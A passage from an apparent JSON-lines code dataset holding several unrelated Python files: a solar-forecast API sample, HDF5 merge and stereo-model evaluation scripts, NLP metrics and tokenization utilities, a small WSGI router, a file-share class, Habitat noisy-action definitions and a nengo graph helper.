outf.write(string)\n","sub_path":"practica1/modelsDefault.py","file_name":"modelsDefault.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"247889614","text":"import solcast\nimport time\nimport pytz 
\n\nr = solcast.get_radiation_forecasts(48.438880, 13.333152, hours=24)\nprint(r.next_forecast) # contains the next forecast datapoint\nprint(r.forecasts) # contain the next datapoints for forecast given the hours parameter\n\nr1 = solcast.get_radiation_estimated_actuals(48.438880, 13.333152, hours=24)\nprint(r1.last_estimated) #contains the next forecast datapoint\nprint(r1.estimated_actuals) #contains the next datapoints for forecast given the hours parameter\n\n\n# site_id is in the format xxxx-xxxx-xxxx-xxxx, x being a hexadecimal digit\n#retrieving rooftop forcasts\nr1 = solcast.get_rooftop_forcasts(\"site_id\")\n\nfor x in r1.content['forecasts']:\n\tdt = x['period_end'] \n\tdt = dt.replace(tzinfo=pytz.timezone('UTC'))\n\tdt = dt.astimezone(pytz.timezone(\"your timezone\"))\n\tdt = time.mktime(dt.timetuple())\n\n\tmeasurement = {'power': float(x['pv_estimate']), 'power10': float(x['pv_estimate10']), 'power90': float(x['pv_estimate90']) }\n\t\n\t#dt has the epoch value, and measurements has the forcasts in kW\n\n\n#sending inverter values for rooftop tuning\nmeasurements = []\nslices = 10 #sending data for 10 minutes periods\nfor i in inverter_values: #inverter_values has the data for the actual produced power average in kW\n\ttemp = {}\n\ttemp['total_power'] = str(round(i['power'],3))\n\tj = int(time.mktime(time.strptime(i[\"time\"], \"%Y-%m-%dT%H:%M:%SZ\")))\n\n\ttemp['period_end'] = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime(j + 60 * slices ))\n\ttemp['period'] = 'PT'+str(slices)+'M'\n\tmeasurements.append(temp)\n\nroof = solcast.post_rooftop_measurements(\"site_id\", measurements)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339065461","text":"'''\nInstructions for Use:\nChange the base direc to be where you are working from in the terminal - it should equal thisdir as a sanity check.\nresults_direc is the folder name that the raw_data2 folder is saved into. \n'''\n\nfrom dedalus import public as de\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport h5py\nimport numpy as np\nimport sys\nimport pathlib\nimport os\nfrom dedalus.tools import post\n\n# Getting the current work directory (cwd)\nthisdir = os.getcwd()\n\n#base_direc = \"Users/tomaddison/Desktop/astro_project/MattExplainedCode/\"\nresults_direc = \"Results3j\"\n\n# This is the directory ending (including) raw_data2. Change raw_data2 if that is not the folder where the results are. \ndirec = os.path.join(thisdir, results_direc, \"raw_data2\")\n\n\n# Change this to analysis, run_parameters and snapshots depending on where we are at. \nsection = \"run_parameters\"\n\nspecificdir =os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_run_parameter_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n for file in f:\n if file.endswith(\".h5\"):\n list_of_run_parameter_files.append(os.path.join(r,file))\n print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n#print(list_of_run_parameter_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. 
\nif len(list_of_run_parameter_files) == 1:\n    final_file = list_of_run_parameter_files[0]\n    print(final_file)\n    # are we just going to pass?\nelif len(list_of_run_parameter_files) == 0:\n    print(\"No Run Parameter files found\")\nelse:\n    # Do the merge for run_parameters here.\n    final_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_run_parameter_files, cleanup=True) \n\n\nsection = \"analysis\"\nspecificdir = os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_analysis_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n    for file in f:\n        if file.endswith(\".h5\"):\n            list_of_analysis_files.append(os.path.join(r,file))\n            print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n#print(list_of_analysis_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. \nif len(list_of_analysis_files) == 1:\n    final_analysis_file = list_of_analysis_files[0]\n    print(final_analysis_file)\nelif len(list_of_analysis_files) == 0:\n    print(\"No analysis files found\")\nelse:\n    # Do the merge for analysis here.\n    final_analysis_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_analysis_files, cleanup=True)\n\n\n\nsection = \"snapshots\"\nspecificdir = os.path.join(direc, section)\n# r=root, d=directories, f = files\nlist_of_snapshot_files = []\nfor r, d, f in os.walk(specificdir): #you need thisdir not specificdir\n    for file in f:\n        if file.endswith(\".h5\"):\n            list_of_snapshot_files.append(os.path.join(r,file))\n            print(os.path.join(r, file))\n\n# Useful for error hunting if the loop above doesn't appear to work as it should\n# print(list_of_snapshot_files)\n\n# If there are 0 or 1 files nothing needs to be merged. But useful to know how many files there are. 
\nif len(list_of_snapshot_files) == 1:\n    final_snapshot_file = list_of_snapshot_files[0]\n    print(final_snapshot_file)\nelif len(list_of_snapshot_files) == 0:\n    print(\"No snapshot files found\")\nelse:\n    # Do the merge for snapshots here.\n    final_snapshot_file = post.merge_sets(results_direc + \"/raw_data2/\" + section + \".h5\", list_of_snapshot_files, cleanup=True) \n","sub_path":"izzy.py","file_name":"izzy.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}\n+{"seq_id":"26144235","text":"import torch.optim as optim\nimport torch\nimport torch.nn.functional as F\nfrom GANet.GANet import GANet\nfrom GANet.GANet_small import GANetSmall\nfrom utils import version_code\nfrom utils.dataset import FlyingThings3D, random_subset, random_split, KITTI_2015\nfrom torch.utils.data import DataLoader, Subset\nimport os\nimport tools\nimport utils\nimport cv2\nimport matplotlib.pyplot as plt\nimport test.model.profile as profile\nimport test\n\nmax_disparity = 192\nversion = 384\nseed = 0\n\ndataset = ['flyingthings3D', 'KITTI_2015']\nimage = ['cleanpass', 'finalpass']\n\nprofile = profile.GDFNet_mdc6()\ndataset = dataset[0]\nimage = image[1]\n\nsave_root = '../../result/{}/{}'.format(profile, dataset)\n\nif dataset == 'flyingthings3D':\n    height = int(256 * 1.5)\n    width = int(512 * 1.5)\n\nelif dataset == 'KITTI_2015':\n    height = int(256)\n    width = int(512 * 2)\nelse:\n    height = None\n    width = None\n    raise Exception('Cannot find dataset: ' + dataset)\n\nsgm = utils.SGM(max_disparity=max_disparity, mode=cv2.STEREO_SGBM_MODE_SGBM)\n\nmodel = profile.load_model(max_disparity, version)[1]\nversion, loss_history = profile.load_history(version)\n\nprint('Using model:', profile)\nprint('Using dataset:', dataset)\nprint('Network image size:', (height, width))\nprint('Number of parameters: {:,}'.format(sum(p.numel() for p in model.parameters())))\n\nif model is not None:\n    if dataset == 'flyingthings3D':\n        test_dataset = FlyingThings3D((height, width), max_disparity, type='test', crop_seed=0, image=image)\n        test_dataset = random_subset(test_dataset, 40, seed=seed)\n        test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n    elif dataset == 'KITTI_2015':\n        train_dataset, test_dataset = random_split(KITTI_2015((height, width), type='train', crop_seed=0), seed=seed)\n        # test_dataset = KITTI_2015((height, width), type='test', crop_seed=0)\n        # test_dataset = random_subset(test_dataset, 100, seed=seed)\n        test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n    else:\n        raise Exception('Cannot find dataset: ' + dataset)\n\n    model.eval()\n    for batch_index, (X, Y) in enumerate(test_loader):\n        with torch.no_grad():\n            if isinstance(profile, test.model.profile.GDFNet_mdc6f):\n                eval_dict = profile.eval(X, Y, dataset, lr_check=False, candidate=True, regression=True)\n\n            elif isinstance(profile, test.model.profile.GDFNet_mdc6):\n                eval_dict = profile.eval(X, Y, dataset, lr_check=False, candidate=False, regression=True)\n                # eval_dict = profile.eval(X, Y, dataset, lr_check=True, regression=True, penalize=False, slope=1,\n                #                          max_disparity_diff=1.5)\n            else:\n                eval_dict = profile.eval(X, Y, dataset)\n            # utils.plot_image_disparity(X[0], Y[0], disp_model[0], loss_model)\n            # exit(0)\n\n            if torch.isnan(eval_dict['epe_loss']):\n                print('detect loss nan in testing')\n                exit(1)\n\n            disp_sgm = sgm.process(X)\n            Y = Y[:, 0, :, :]\n            mask = utils.y_mask(Y, max_disparity, dataset)\n            disp_sgm[:, :, :max_disparity] = -1\n            mask_sgm = 
mask & (disp_sgm != -1)\n sgm_loss = utils.EPE_loss(disp_sgm[mask_sgm], Y[mask_sgm])\n\n print('[{}/{}]'.format(batch_index + 1, len(test_loader)))\n print('\\tmodel_loss = {:.3f}'.format(eval_dict['epe_loss']))\n print('\\tsgm_loss = {:.3f}'.format(sgm_loss))\n\n utils.save_comparision(X[0], Y[0], eval_dict['disp'][0], disp_sgm[0], eval_dict['epe_loss'], sgm_loss, save_root,\n 'S{:03d}-B{:03d}.png'.format(seed, batch_index), str(profile))\n","sub_path":"test/model/model_compare.py","file_name":"model_compare.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"44688923","text":"from collections import defaultdict\nfrom typing import Dict, List, Optional, Tuple\n\nimport torch\nfrom rhoknp import Document, Sentence\nfrom seqeval.metrics import accuracy_score, f1_score\nfrom seqeval.scheme import IOB2\n\nfrom kwja.callbacks.utils import convert_predictions_into_tags, set_morphemes\nfrom kwja.datamodule.datasets import CharDataset\nfrom kwja.metrics.base import BaseModuleMetric\nfrom kwja.metrics.utils import unique\nfrom kwja.utils.constants import IGNORE_INDEX, WORD_NORM_OP_TAGS\nfrom kwja.utils.sub_document import extract_target_sentences, to_orig_doc_id\n\n\nclass CharModuleMetric(BaseModuleMetric):\n STATE_NAMES = (\n \"example_ids\",\n \"word_segmentation_predictions\",\n \"word_norm_op_predictions\",\n \"word_norm_op_labels\",\n )\n\n def __init__(self) -> None:\n super().__init__()\n self.dataset: Optional[CharDataset] = None\n self.example_ids: torch.Tensor\n self.word_segmentation_predictions: torch.Tensor\n self.word_norm_op_predictions: torch.Tensor\n self.word_norm_op_labels: torch.Tensor\n\n @staticmethod\n def pad(kwargs: Dict[str, torch.Tensor], max_seq_length: int) -> None:\n for key, value in kwargs.items():\n if key in {\"example_ids\"}:\n continue\n else:\n dims = [1]\n for dim in dims:\n size = [max_seq_length - s if i == dim else s for i, s in enumerate(value.size())]\n if size[dim] == 0:\n continue\n padding = torch.zeros(size, dtype=value.dtype, device=value.device)\n value = torch.cat([value, padding], dim=dim)\n kwargs[key] = value\n\n def compute(self) -> Dict[str, float]:\n sorted_indices = unique(self.example_ids)\n for state_name in self.STATE_NAMES:\n state = getattr(self, state_name)\n setattr(self, state_name, state[sorted_indices])\n\n predicted_documents, gold_documents = self._build_documents()\n\n return {\n **self.compute_word_segmentation_metrics(predicted_documents, gold_documents),\n **self.compute_word_normalization_metrics(self.word_norm_op_predictions, self.word_norm_op_labels),\n }\n\n def _build_documents(self) -> Tuple[List[Document], List[Document]]:\n assert self.dataset is not None, \"dataset isn't set\"\n\n doc_id2predicted_sentences: Dict[str, List[Sentence]] = defaultdict(list)\n doc_id2gold_sentences: Dict[str, List[Sentence]] = defaultdict(list)\n special_ids = set(self.dataset.tokenizer.all_special_ids) - {self.dataset.tokenizer.unk_token_id}\n for example_id, word_segmentation_predictions, word_norm_op_predictions in zip(\n self.example_ids.tolist(),\n self.word_segmentation_predictions.tolist(),\n self.word_norm_op_predictions.tolist(),\n ):\n example = self.dataset.examples[example_id]\n gold_document = self.dataset.doc_id2document[example.doc_id]\n predicted_document = Document.from_jumanpp(gold_document.to_jumanpp())\n predicted_document.doc_id = gold_document.doc_id\n\n assert (\n len(example.encoding.input_ids) == 
len(word_segmentation_predictions) == len(word_norm_op_predictions)\n )\n word_segmentation_tags, word_norm_op_tags = convert_predictions_into_tags(\n word_segmentation_predictions, word_norm_op_predictions, example.encoding.input_ids, special_ids\n )\n set_morphemes(predicted_document, word_segmentation_tags, word_norm_op_tags)\n\n orig_doc_id = to_orig_doc_id(gold_document.doc_id)\n for sentence in extract_target_sentences(predicted_document):\n doc_id2predicted_sentences[orig_doc_id].append(sentence)\n for sentence in extract_target_sentences(gold_document):\n doc_id2gold_sentences[orig_doc_id].append(sentence)\n predicted_documents = self._convert_doc_id2sentences_into_documents(doc_id2predicted_sentences)\n gold_documents = self._convert_doc_id2sentences_into_documents(doc_id2gold_sentences)\n return predicted_documents, gold_documents\n\n @staticmethod\n def _convert_doc_id2sentences_into_documents(doc_id2sentences: Dict[str, List[Sentence]]) -> List[Document]:\n # Build documents that do not have clauses, phrases, or base phrases, but morphemes only\n return [Document.from_jumanpp(\"\".join(s.to_jumanpp() for s in ss)) for ss in doc_id2sentences.values()]\n\n def compute_word_segmentation_metrics(\n self, predicted_documents: List[Document], gold_documents: List[Document]\n ) -> Dict[str, float]:\n labels = [self._convert_document_into_segmentation_tags(d) for d in gold_documents]\n predictions = [self._convert_document_into_segmentation_tags(d) for d in predicted_documents]\n return {\n \"word_segmentation_accuracy\": accuracy_score(y_true=labels, y_pred=predictions),\n \"word_segmentation_f1\": f1_score(y_true=labels, y_pred=predictions, mode=\"strict\", scheme=IOB2).item(),\n }\n\n @staticmethod\n def _convert_document_into_segmentation_tags(document: Document) -> List[str]:\n segmentation_tags = []\n for morpheme in document.morphemes:\n segmentation_tags.extend([\"B\"] + [\"I\"] * (len(morpheme.text) - 1))\n return segmentation_tags\n\n @staticmethod\n def compute_word_normalization_metrics(predictions: torch.Tensor, labels: torch.Tensor) -> Dict[str, float]:\n ignored_indices = labels.eq(IGNORE_INDEX)\n predictions = predictions[~ignored_indices]\n labels = labels[~ignored_indices]\n\n metrics: Dict[str, float] = {\n \"word_normalization_accuracy\": accuracy_score(y_true=labels, y_pred=predictions).item()\n }\n\n keep_indices = predictions.eq(WORD_NORM_OP_TAGS.index(\"K\"))\n if (~keep_indices).sum().item() == 0:\n precision = 0.0\n else:\n precision = accuracy_score(y_true=labels[~keep_indices], y_pred=predictions[~keep_indices]).item()\n\n keep_indices = labels.eq(WORD_NORM_OP_TAGS.index(\"K\"))\n if (~keep_indices).sum().item() == 0:\n recall = 0.0\n else:\n recall = accuracy_score(y_true=labels[~keep_indices], y_pred=predictions[~keep_indices]).item()\n\n if (precision + recall) == 0.0:\n f1 = 0.0\n else:\n f1 = (2 * precision * recall) / (precision + recall)\n metrics[\"word_normalization_f1\"] = f1\n\n for word_norm_op_index, word_norm_op_tag in enumerate(WORD_NORM_OP_TAGS):\n indices = predictions.eq(word_norm_op_index)\n if indices.sum().item() == 0:\n precision = 0.0\n else:\n precision = accuracy_score(y_true=labels[indices], y_pred=predictions[indices]).item()\n\n indices = labels.eq(word_norm_op_index)\n if indices.sum().item() == 0:\n recall = 0.0\n else:\n recall = accuracy_score(y_true=labels[indices], y_pred=predictions[indices]).item()\n\n if (precision + recall) == 0.0:\n f1 = 0.0\n else:\n f1 = (2 * precision * recall) / (precision + recall)\n 
metrics[f\"word_normalization_f1:{word_norm_op_tag}\"] = f1\n return metrics\n","sub_path":"src/kwja/metrics/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"247021209","text":"import webob.dec\nfrom webob.exc import HTTPNotFound as HTTPNotFound\nfrom routes.mapper import Mapper\n\n\nclass WsgiHack(webob.dec.wsgify):\n def __call__(self, environ, start_response):\n self.kwargs[\"start_response\"] = start_response\n return super(WsgiHack, self).__call__(environ, start_response)\n\n\nclass WSGIApplication(object):\n def __init__(self):\n super(WSGIApplication, self).__init__()\n self.mapper = Mapper()\n self._match = lambda req: self.mapper.match(environ=req.environ)\n\n @WsgiHack\n def __call__(self, req, start_response):\n match = self._match(req)\n\n if not match:\n return HTTPNotFound()\n\n req.start_response = start_response\n req.urlvars = match\n\n name = match[\"controller\"].__name__\n\n controller = match[\"controller\"](req)\n\n return controller(req)\n\n\nclass BaseController(object):\n def __init__(self, req):\n self.req = req\n\n def __call__(self, req):\n action = self.req.urlvars.get('action', 'index')\n\n kwarg = self.req.urlvars.copy()\n\n return getattr(self, action)(self.req, **kwarg)\n","sub_path":"rest/wsgi_app.py","file_name":"wsgi_app.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530697338","text":"from arkos import storage\nfrom arkos.system import systemtime\n\n\nclass Share:\n def __init__(self, id, path, expires=0):\n self.id = id\n self.path = path\n self.expires = expires\n self.fetch_count = 0\n\n def add(self):\n storage.files.add(\"shares\", self)\n\n def delete(self):\n storage.files.remove(\"shares\", self)\n\n def is_expired(self):\n return (self.expires != 0 and self.expires < systemtime.get_unix_time())\n\n def update_expiry(self, nexpiry):\n if nexpiry == False:\n self.expires = 0\n else:\n self.expires = systemtime.get_unix_time(nexpiry)\n\n @property\n def as_dict(self):\n return {\n \"id\": self.id,\n \"path\": self.path,\n \"expires\": self.expires != 0,\n \"expires_at\": systemtime.ts_to_datetime(self.expires, \"unix\") if self.expires != 0 else \"\",\n \"fetch_count\": self.fetch_count\n }\n\n @property\n def serialized(self):\n data = self.as_dict\n data[\"expires_at\"] = systemtime.get_iso_time(self.expires, \"unix\") if self.expires != 0 else \"\",\n return data\n\n\ndef get(id=None):\n data = storage.files.get(\"shares\")\n to_purge = []\n for x in data:\n if x.is_expired():\n to_purge.append(x)\n for x in to_purge:\n x.delete()\n if id:\n for x in data:\n if x.id == id:\n return x\n return None\n return data\n","sub_path":"arkos/shared_files.py","file_name":"shared_files.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109395084","text":"import re\nimport torch\n\nfrom functools import wraps\n\nfrom parameters import SOS_IDX, EOS_IDX, UNK_IDX, PAD_IDX, CUDA\n\n\ndef normalize(x):\n # x = re.sub(\"[\\uAC00-\\uD7A3]+\", \"\\uAC00\", x) £ convert Hangeul to 가\n # x = re.sub(\"[\\u3040-\\u30FF]+\", \"\\u3042\", x) # convert Hiragana and Katakana to あ\n # x = re.sub(\"[\\u4E00-\\u9FFF]+\", \"\\u6F22\", x) # convert CJK unified ideographs to 漢\n x = re.sub(\"\\s+\", \" \", x)\n x = re.sub(\"^ | $\", \"\", x)\n x = 
x.lower()\n return x\n\n\ndef tokenize(x, unit):\n x = normalize(x)\n if unit == \"char\":\n return re.sub(\" \", \"\", x)\n elif unit == \"word\":\n return x.split(\" \")\n\n\ndef save_data(filename, data):\n with open(filename, \"w\") as outfile:\n for seq in data:\n outfile.write(\" \".join(seq) + \"\\n\")\n\n\ndef load_tkn_to_idx(filename):\n print(\"loading {}\".format(filename))\n tkn_to_idx = {}\n with open(filename) as infile:\n for line in infile:\n line = line[:-1]\n tkn_to_idx[line] = len(tkn_to_idx)\n return tkn_to_idx\n\n\ndef load_idx_to_tkn(filename):\n print(\"loading {}\".format(filename))\n idx_to_tkn = []\n with open(filename) as infile:\n for line in infile:\n line = line[:-1]\n idx_to_tkn.append(line)\n return idx_to_tkn\n\n\ndef save_tkn_to_idx(filename, tkn_to_idx):\n with open(filename, \"w\") as outfile:\n for tkn, _ in sorted(tkn_to_idx.items(), key=lambda x: x[1]):\n outfile.write(\"%s\\n\" % tkn)\n\n\ndef load_checkpoint(filename, model=None):\n print(\"loading {}\".format(filename))\n checkpoint = torch.load(filename)\n if model:\n model.load_state_dict(checkpoint[\"state_dict\"])\n epoch = checkpoint[\"epoch\"]\n loss = checkpoint[\"loss\"]\n print(\"saved model: epoch = {:d}, loss = {:f}\".format(checkpoint[\"epoch\"], checkpoint[\"loss\"]))\n return epoch\n\n\ndef save_checkpoint(filename, model, epoch, loss, time):\n print(\"epoch = {:d}, loss = {:f}, time = {:f}\".format(epoch, loss, time))\n if filename and model:\n print(\"saving {}\".format(filename))\n checkpoint = {\"state_dict\": model.state_dict(), \"epoch\": epoch, \"loss\": loss}\n torch.save(checkpoint, filename + \".epoch%d\" % epoch)\n print(\"saved model at epoch {:d}\".format(epoch))\n\n\ndef cudify(f):\n @wraps(f)\n def cudified(*args):\n x = f(*args)\n return x.cuda() if CUDA else x\n return cudified\n\n\nTensor = cudify(torch.Tensor)\nLongTensor = cudify(torch.LongTensor)\nrandn = cudify(torch.randn)\nzeros = cudify(torch.zeros)\n\n\ndef log_sum_exp(x):\n m = torch.max(x, -1)[0]\n return m + torch.log(torch.sum(torch.exp(x - m.unsqueeze(-1)), -1))\n\n\ndef batchify(xc, xw, minlen=0, sos=True, eos=True):\n xw_len = max(minlen, max(len(x) for x in xw))\n if xc:\n xc_len = max(minlen, max(len(w) for x in xc for w in x))\n pad = [[PAD_IDX] * (xc_len + 2)]\n xc = [[[SOS_IDX] + w + [EOS_IDX] + [PAD_IDX] * (xc_len - len(w)) for w in x] for x in xc]\n xc = [(pad if sos else []) + x + (pad * (xw_len - len(x) + eos)) for x in xc]\n xc = LongTensor(xc)\n sos = [SOS_IDX] if sos else []\n eos = [EOS_IDX] if eos else []\n xw = [sos + list(x) + eos + [PAD_IDX] * (xw_len - len(x)) for x in xw]\n return xc, LongTensor(xw)\n\n\ndef iob_to_txt(x, y, unit):\n out = \"\"\n x = tokenize(x, unit)\n for i, j in enumerate(y):\n if i and j[0] == \"B\":\n out += \" \"\n out += x[i]\n return out\n\n\ndef f1(prec, recall):\n return 2 * prec * recall / (prec + recall) if prec + recall else 0\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"148219035","text":"import time\nimport math\nimport RTCvideo\n\n\nIP = '127.0.0.1'\nRTP_RECV_PORT0 = 5000\nRTCP_RECV_PORT0 = 5001\nRTCP_SEND_PORT0 = 5005\n\n\n\n\n\nvideo=RTCvideo.Video(IP, RTP_RECV_PORT0, RTCP_RECV_PORT0, RTCP_SEND_PORT0)\nvideo.draw_overlay(\"ring.png\", x = 0, y = 0, scale_x = 0.6, scale_y = 0.8)\n\n\nprint(\"I started\")\nvideo.start()\n\ntime.sleep(1000)\n\nvideo.stop()\nprint(\"I 
stopped\")\n\ntime.sleep(1)\n\nvideo.start()\nprint(\"I started\")\n\ntime.sleep(10)\n\nvideo.paused()\nprint(\"I paused\")\n\ntime.sleep(10)\n\nprint(\"I started\")\nvideo.start()\n\ntime.sleep(10)\n\nvideo.stop()\nprint(\"I stopped\")\n\n\n","sub_path":"Projects/BadProjects/GstreamerVideoOLD/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"144681281","text":"import attr\nimport numpy as np\nimport sys\nsys.path.append('../habitat-api')\nimport habitat\nimport habitat_sim\nimport habitat_sim.utils\nfrom habitat.sims.habitat_simulator.action_spaces import (\n HabitatSimV1ActionSpaceConfiguration,\n)\nfrom habitat_sim.agent.controls import register_move_fn\nimport magnum as mn\n\n\"\"\"\nRegister Additional Noisy Actions to Habitat-sim\nfor implementation of \"Visual Memory for Robust Path Following\"\n\"\"\"\n\nTHETA = 20 # default : 10\nX = 0.30 # default : 0.25\nSPIN_NOISE = 1 # rad\nFORWARD_NOISE = 0.5 #\nFN_CLIP_RATIO = 0.4\nSN_CLIP_RATIO = 0.4\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass MoveAndSpinSpec:\n forward_amount: float\n spin_amount: float\n noise : bool\n\n\ndef _noisy_move(\n scene_node: habitat_sim.SceneNode,\n forward_amount: float,\n spin_amount: float,\n noise : bool\n):\n forward_ax = (\n np.array(scene_node.absolute_transformation().rotation_scaling())\n @ habitat_sim.geo.FRONT\n )\n forward_noise = np.random.normal(forward_amount, FORWARD_NOISE) if noise else 0\n forward = np.clip(forward_amount + forward_noise, np.maximum(forward_amount - FN_CLIP_RATIO*X,0), forward_amount + FN_CLIP_RATIO*X)\n scene_node.translate_local(forward_ax * forward)\n\n spin_noise = np.random.normal(0, SPIN_NOISE) * 180 / 3.141592 if noise else 0\n spin = np.clip(spin_amount + spin_noise, spin_amount - SN_CLIP_RATIO * THETA, spin_amount + SN_CLIP_RATIO * THETA)\n\n #print('forward : {}, spin : {}'.format(forward,spin))\n # Rotate about the +y (up) axis\n rotation_ax = habitat_sim.geo.UP\n scene_node.rotate_local(mn.Deg(spin), rotation_ax)\n # Calling normalize is needed after rotating to deal with machine precision errors\n scene_node.rotation = scene_node.rotation.normalized()\n\n\n\n@register_move_fn(body_action=True)\nclass NoisyForward(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy forward : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n\n@register_move_fn(body_action=True)\nclass NoisyLeft(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy left : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n@register_move_fn(body_action=True)\nclass NoisyRight(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy right : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n -actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n\n\n\n@habitat.registry.register_action_space_configuration\nclass NoNoisyMove(HabitatSimV1ActionSpaceConfiguration):\n def get(self):\n config = super().get()\n\n 
config[habitat.SimulatorActions.NOISY_FORWARD] = habitat_sim.ActionSpec(\n \"noisy_forward\",\n MoveAndSpinSpec(X, 0, noise=False)\n )\n config[habitat.SimulatorActions.NOISY_LEFT] = habitat_sim.ActionSpec(\n \"noisy_left\",\n MoveAndSpinSpec(0,THETA,noise=False)\n )\n config[habitat.SimulatorActions.NOISY_RIGHT] = habitat_sim.ActionSpec(\n \"noisy_right\",\n MoveAndSpinSpec(0,THETA,noise=False)\n )\n\n\n return config\n\n\n@habitat.registry.register_action_space_configuration\nclass NoisyMove(HabitatSimV1ActionSpaceConfiguration):\n def get(self):\n config = super().get()\n\n config[habitat.SimulatorActions.NOISY_FORWARD] = habitat_sim.ActionSpec(\n \"noisy_forward\",\n MoveAndSpinSpec(X, 0, noise=True),\n )\n config[habitat.SimulatorActions.NOISY_LEFT] = habitat_sim.ActionSpec(\n \"noisy_left\",\n MoveAndSpinSpec(0,THETA,noise=True),\n )\n config[habitat.SimulatorActions.NOISY_RIGHT] = habitat_sim.ActionSpec(\n \"noisy_right\",\n MoveAndSpinSpec(0,THETA,noise=True),\n )\n\n\n return config\n\n\ndef main():\n habitat.SimulatorActions.extend_action_space(\"NOISY_LEFT\")\n habitat.SimulatorActions.extend_action_space(\"NOISY_RIGHT\")\n habitat.SimulatorActions.extend_action_space(\"NOISY_FORWARD\")\n\n config = habitat.get_config(config_paths=\"../habitat-api/configs/tasks/pointnav.yaml\")\n config.defrost()\n config.SIMULATOR.ACTION_SPACE_CONFIG = \"NoNoisyMove\"\n config.DATASET.DATA_PATH = \"../habitat-api/\" + config.DATASET.DATA_PATH\n config.SIMULATOR.SCENE = '../habitat-api/' + config.SIMULATOR.SCENE\n config.freeze()\n\n env = habitat.Env(config=config)\n env.reset()\n env.step(habitat.SimulatorActions.NOISY_LEFT)\n env.step(habitat.SimulatorActions.NOISY_RIGHT)\n env.step(habitat.SimulatorActions.NOISY_FORWARD)\n env.close()\n\n config.defrost()\n config.SIMULATOR.ACTION_SPACE_CONFIG = \"NoisyMove\"\n config.freeze()\n\n env = habitat.Env(config=config)\n env.reset()\n env.step(habitat.SimulatorActions.NOISY_LEFT)\n env.step(habitat.SimulatorActions.NOISY_RIGHT)\n env.step(habitat.SimulatorActions.NOISY_FORWARD)\n env.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RPF_DAgger/NoisyAction.py","file_name":"NoisyAction.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588395841","text":"\"\"\"These are helper functions that various backends may find useful for\ngenerating their own Builder system.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport collections\n\nimport numpy as np\n\nimport nengo\n\n\ndef objs_and_connections(network):\n \"\"\"Given a Network, returns all (ensembles + nodes, connections).\"\"\"\n objs = list(network.ensembles + network.nodes)\n connections = list(network.connections)\n for subnetwork in network.networks:\n subobjs, subconnections = objs_and_connections(subnetwork)\n objs.extend(subobjs)\n connections.extend(subconnections)\n return objs, connections\n\n\ndef generate_graphviz(objs, connections):\n \"\"\"Create a .gv file with this set of objects and connections\n\n Parameters\n ----------\n objs : list of Nodes and Ensembles\n All the objects in the model\n connections : list of Connections\n All the Connections in the model\n\n Returns the text contents of the desired .dot file\n\n This can be useful for debugging and testing Builders that manipulate\n the model graph before construction.\n \"\"\"\n text = []\n text.append('digraph G {')\n for obj in objs:\n text.append(' \"%d\" [label=\"%s\"];' % (id(obj), obj.label))\n\n def 
